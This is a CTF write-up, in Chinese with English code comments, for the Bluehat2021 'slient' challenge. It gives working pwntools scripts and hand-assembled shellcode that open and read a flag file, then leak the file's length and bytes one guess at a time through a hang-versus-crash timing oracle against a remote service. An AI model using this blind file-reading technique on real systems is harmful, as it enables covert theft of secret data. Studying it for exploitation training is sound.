Bluehat2021-slient-WP
这题本身没什么特别的，本质上是一次盲爆破。由于 shellcode 无法输出任何内容，需要一个能区分“猜对/猜错”的信号：把比较结果接到 `jne +2`，其后紧跟 `\xeb\xfe`（即 `jmp $`，跳到自身的死循环，写法上相当于 `jmp 0`）。猜对时 `jne` 不跳转，进程停在死循环里空转，连接保持打开（客户端只会等到超时）；猜错时 `jne` 跳过死循环，执行流落到后面的填充/路径字节上触发段错误，进程退出，客户端就会看到 Got EOF。因此每猜一个值都要新开一次连接，用“超时 vs EOF”作为 oracle。另外注意 `cmp rax, imm8` 的立即数会被符号扩展，这种编码只能正确比较 0~127 范围内的长度。
open/read 两段 shellcode 可以直接用 pwntools 的 shellcraft 生成；路径字符串必须以原始字节（并以 NUL 结尾）放在 open 所引用的固定偏移处，而不能用 pushstr 之类生成指令序列的方式追加：
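# Sketch of the length-probe shellcode, generated with pwntools' shellcraft.
# Layout assumed by the addresses below: the shellcode box is mapped at 0x10000,
# the flag path is stored at box+0x30 and the read() buffer is at 0x10500.
# Control flow after read():  cmp rax, N ; jne +2 ; jmp $
#   - rax == N : the jmp-to-self spins forever and the connection stays open
#   - rax != N : jne skips the loop, execution runs into the padding/path bytes
#                and the process dies, which the client observes as EOF.
FLAG_PATH = b"/home/pwn/flag"
PATH_OFFSET = 0x30
shellcode = asm(shellcraft.amd64.syscall('SYS_open', 0x10000 + PATH_OFFSET, 0).rstrip())
# fd 3 assumes only stdin/stdout/stderr are open in the target.
shellcode += asm(shellcraft.amd64.syscall('SYS_read', 3, 0x10500, 40).rstrip())
shellcode += asm("cmp rax, 12")
shellcode += b"\x75\x02"  # jne +2: skip the self-loop when the length differs
shellcode += b"\xeb\xfe"  # jmp $ : spin forever, the "no EOF" signal
assert len(shellcode) <= PATH_OFFSET, "probe code overlaps the path string"
shellcode = shellcode.ljust(PATH_OFFSET, b"a")
# open() reads the path as raw NUL-terminated bytes at box+0x30.  The original
# appended a shellcraft pushstr here (which emits push instructions, not data)
# and used "=" instead of "+=", which threw the probe code away.
shellcode += FLAG_PATH + b"\x00"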
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
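HOST, PORT = "8.140.177.7", 40334

# Memory layout assumed by the hand-assembled stubs below: the shellcode box is
# mapped at 0x10000, the flag path is placed at box+0x30 and read() lands at
# 0x10500.  The mov/xor pairs only keep NUL bytes out of the immediates.
PATH_OFFSET = 0x30
FLAG_PATH = b"../pwn/flag"  # relative to the sandbox cwd; shorter than /home/pwn/flag

# open(0x10030, O_RDONLY):
#   push 2 ; pop rax ; mov edi, 0x01020101 ; xor edi, 0x01030131 (-> 0x10030)
#   xor esi, esi ; syscall
OPEN_STUB = (b"\x6a\x02\x58"
             b"\xbf\x01\x01\x02\x01\x81\xf7\x31\x01\x03\x01"
             b"\x31\xf6\x0f\x05")
# read(3, 0x10500, 40)  -- fd 3 assumes only stdin/stdout/stderr are open:
#   xor eax, eax ; push 3 ; pop rdi ; push 40 ; pop rdx
#   mov esi, 0x01020101 ; xor esi, 0x01030401 (-> 0x10500) ; syscall
READ_STUB = (b"\x31\xc0\x6a\x03\x5f\x6a\x28\x5a"
             b"\xbe\x01\x01\x02\x01\x81\xf6\x01\x04\x03\x01"
             b"\x0f\x05")

# Lengths to probe.  read() is capped at 40 bytes, so a full search is
# range(1, 41); the original run had already narrowed it down to 18.
CANDIDATE_LENGTHS = range(18, 19)


def build_length_probe(length):
    """Return the probe shellcode for one guess of the flag file's read() length.

    After open()/read() the code executes ``cmp rax, length ; jne +2 ; jmp $``:
    on a match it spins forever (the connection stays open), otherwise it runs
    off into the padding and path bytes and the process dies (client sees EOF).

    Args:
        length: guessed byte count, 0..127.  ``cmp rax, imm8`` sign-extends the
            immediate, so larger values would silently compare against
            negative numbers.

    Returns:
        bytes: probe code padded with ``b"a"`` up to PATH_OFFSET, followed by
        the NUL-terminated path.

    Raises:
        ValueError: if ``length`` does not fit a non-negative imm8.
    """
    if not 0 <= length <= 0x7f:
        raise ValueError("length must be in 0..127, got %r" % (length,))
    code = OPEN_STUB + READ_STUB
    code += b"\x48\x83\xf8" + struct.pack("B", length)  # cmp rax, imm8
    code += b"\x75\x02"  # jne +2: skip the self-loop when the length differs
    code += b"\xeb\xfe"  # jmp $ : spin forever -> "no EOF" means the guess matched
    assert len(code) <= PATH_OFFSET, "probe code overlaps the path string"
    # Terminate the path explicitly instead of relying on a zero-filled box.
    return code.ljust(PATH_OFFSET, b"a") + FLAG_PATH + b"\x00"


def length_matches(length, timeout=3):
    """Send one probe and report whether the target hung (guess matched).

    A fresh connection is needed per guess because a wrong guess kills the
    target.  EOF within ``timeout`` seconds means it crashed (False); silence
    means the jmp-to-self loop is running (True).  The original script left
    this to a human watching ``interactive()`` for "Got EOF".
    """
    sh = remote(HOST, PORT)
    try:
        sh.sendafter(b"box.\n", build_length_probe(length))
        try:
            sh.recv(timeout=timeout)  # b"" on timeout; the target prints nothing
        except EOFError:
            return False
        return True
    finally:
        sh.close()


def main():
    context.log_level = 'debug'
    context.arch = "amd64"
    context.terminal = ["tmux", "splitw", "-h"]
    for length in CANDIDATE_LENGTHS:
        log.info("probing read() length %d" % length)
        if length_matches(length):
            log.success("read() on the flag returned %d bytes" % length)
            break


if __name__ == "__main__":
    main()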
通过这个脚本可以确定 read 返回的长度为 18 字节（flag 本身 17 个字符，最后一个字节应为换行）。同时也试出了一条更短的 flag 路径 “../pwn/flag”（相对于进程的工作目录；若 box 的长度有限，更短的路径可以减少 payload 总长）。接下来逐字节爆破 flag 内容：把 read 缓冲区中第 index 个字节读入 al，与候选字符比较，同样用“超时 vs EOF”判断是否猜中。脚本如下：
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
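HOST, PORT = "8.140.177.7", 40334

# Same layout as the length probe, except the path now sits at box+0x35 (the
# open() stub's xor immediate encodes 0x10035) and the compare reads one byte
# of the read() buffer at 0x10500 instead of checking rax.
PATH_OFFSET = 0x35
READ_BUF = 0x10500
READ_LEN = 40
FLAG_PATH = b"../pwn/flag"  # relative to the sandbox cwd

# open(0x10035, O_RDONLY):
#   push 2 ; pop rax ; mov edi, 0x01020101 ; xor edi, 0x01030134 (-> 0x10035)
#   xor esi, esi ; syscall
OPEN_STUB = (b"\x6a\x02\x58"
             b"\xbf\x01\x01\x02\x01\x81\xf7\x34\x01\x03\x01"
             b"\x31\xf6\x0f\x05")
# read(3, 0x10500, 40)  -- fd 3 assumes only stdin/stdout/stderr are open:
#   xor eax, eax ; push 3 ; pop rdi ; push 40 ; pop rdx
#   mov esi, 0x01020101 ; xor esi, 0x01030401 (-> 0x10500) ; syscall
READ_STUB = (b"\x31\xc0\x6a\x03\x5f\x6a\x28\x5a"
             b"\xbe\x01\x01\x02\x01\x81\xf6\x01\x04\x03\x01"
             b"\x0f\x05")

# Candidate bytes in the order they are tried: digits, lowercase, uppercase,
# then punctuation.  The original literal was truncated after "<=>" in the
# copy reviewed; this is the printable ASCII set (minus space) in that order.
CHARSET = (b"0123456789"
           b"abcdefghijklmnopqrstuvwxyz"
           b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
           b"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~")

# Bytes recovered so far; the next unknown byte is at index len(KNOWN).
KNOWN = b"flag{k33p_qu14t"


def build_char_probe(index, guess):
    """Return shellcode that hangs iff byte ``index`` of the flag equals ``guess``.

    After open()/read() the code does ``mov al, [READ_BUF + index] ; cmp al,
    guess ; jne +2 ; jmp $``: a match spins forever (no EOF), a mismatch runs
    into the padding/path bytes and crashes (EOF).

    Args:
        index: 0-based byte position inside the read() buffer (< READ_LEN).
        guess: candidate byte value, 0..255.

    Returns:
        bytes: probe code padded with ``b"a"`` up to PATH_OFFSET followed by
        the NUL-terminated path.

    Raises:
        ValueError: if ``index`` is outside the read() buffer or ``guess`` is
            not a byte value.
    """
    if not 0 <= index < READ_LEN:
        raise ValueError("index must be in 0..%d, got %r" % (READ_LEN - 1, index))
    if not 0 <= guess <= 0xff:
        raise ValueError("guess must be a byte value, got %r" % (guess,))
    code = OPEN_STUB + READ_STUB
    # mov al, byte ptr [disp32]; the disp32 may contain NUL bytes, which is
    # fine because the box is filled with read(), not a string copy.
    code += b"\x8a\x04\x25" + struct.pack("<I", READ_BUF + index)
    code += b"\x3c" + struct.pack("B", guess)  # cmp al, imm8
    code += b"\x75\x02"  # jne +2: skip the self-loop on a mismatch
    code += b"\xeb\xfe"  # jmp $ : spin forever -> "no EOF" means a match
    assert len(code) <= PATH_OFFSET, "probe code overlaps the path string"
    # Terminate the path explicitly instead of relying on a zero-filled box.
    return code.ljust(PATH_OFFSET, b"a") + FLAG_PATH + b"\x00"


def char_matches(index, guess, timeout=3):
    """Send one probe and report whether the target hung (guess matched).

    Each guess needs a fresh connection because a mismatch kills the target.
    EOF within ``timeout`` seconds means a crash (False); silence means the
    jmp-to-self loop is running (True).  The original script relied on a human
    watching ``interactive()`` and a bare ``except:`` that also swallowed
    Ctrl-C and the NameError from its truncated charset literal.
    """
    sh = remote(HOST, PORT)
    try:
        sh.recvuntil(b"Welcome")
        sh.sendafter(b"box.\n", build_char_probe(index, guess))
        try:
            sh.recv(timeout=timeout)  # b"" on timeout; the target prints nothing
        except EOFError:
            return False
        return True
    finally:
        sh.close()


def recover_byte(index, charset=CHARSET):
    """Brute-force flag[index] over ``charset``; return the byte value or None."""
    for guess in bytearray(charset):
        log.info("index %d: trying %r" % (index, chr(guess)))
        if char_matches(index, guess):
            return guess
    return None


def main():
    context.terminal = ["tmux", "splitw", "-h"]
    context.log_level = 'debug'
    index = len(KNOWN)
    found = recover_byte(index)
    if found is None:
        log.failure("no candidate matched at index %d" % index)
    else:
        log.success("flag[%d] = %r -> %r" % (index, chr(found), KNOWN + bytearray([found])))


if __name__ == "__main__":
    main()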
最后得出 flag:flag{k33p_qu14t!}